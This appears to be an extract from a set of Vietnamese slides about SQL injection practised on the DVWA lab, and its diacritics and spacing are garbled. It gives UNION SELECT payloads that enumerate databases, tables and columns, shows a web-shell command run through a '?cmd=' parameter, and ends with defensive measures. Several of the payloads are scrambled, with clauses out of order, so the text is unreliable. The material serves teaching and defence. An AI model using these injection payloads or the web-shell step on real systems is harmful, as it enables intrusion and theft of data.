SQL Injection l mt trong nhng kiu hack web ang dn tr nn ph bin hin nay. Bng cch inject cc m SQL query/command vo input trc khi chuyn cho ng dng web x l, chng ta c th login m khng cn username v password, remote execution, dump data v ly root ca SQL server. Cng c dng tn cng l mt trnh duyt web bt k, chng hn nh Internet Explorer, Firefox, Google Chrome, ... 100
101
Du # c s dng loi b tc dng ca du () sau cng trong cu lnh truy vn sql: SELECT first_name, last_name FROM users WHERE user_id = $user_id Xem tn c d liu: a UNION select 1, database();#
102
Xem tt c cc tn c s d liu cng cc bng c trong h qun tr csdl MySQL: a UNION select information_schema.tables;# table_schema, table_name, from
Chng ta c th thm mnh iu kin WHERE gii hn li kt qu a UNION select table_schema, table_name, from information_schema.tables where table_schema=dvwa;# 103
Lit k cc column trong bng: a UNION select table_name, column_name, information_schema.columns where table_schema=dvwa;# from
Sau khi tao xong, chng ta ch cn thc hin lnh trn trnh duyt, pha sau chui ?cmd=cu lnh. V d: 192.168.10.20/sqlinjection.php?cmd=dirta c:
104
i password mc nh ca user root Xo tt c cc th tc c mc nh lu tr trn server Lc nhng k t c th gy hi nh ,,,:,# ngay t khi nhn yu cu truy vn t bn ngoi Update SQL vi nhng bn mi nht Kho cc t kha nhy cm i vi SQL bng cch dng firewall chn ngay t u vo M ha password Loi b nhng t kha SELECT, DELETE, INSERT, trong cu truy vn t bn ngoi.
105
106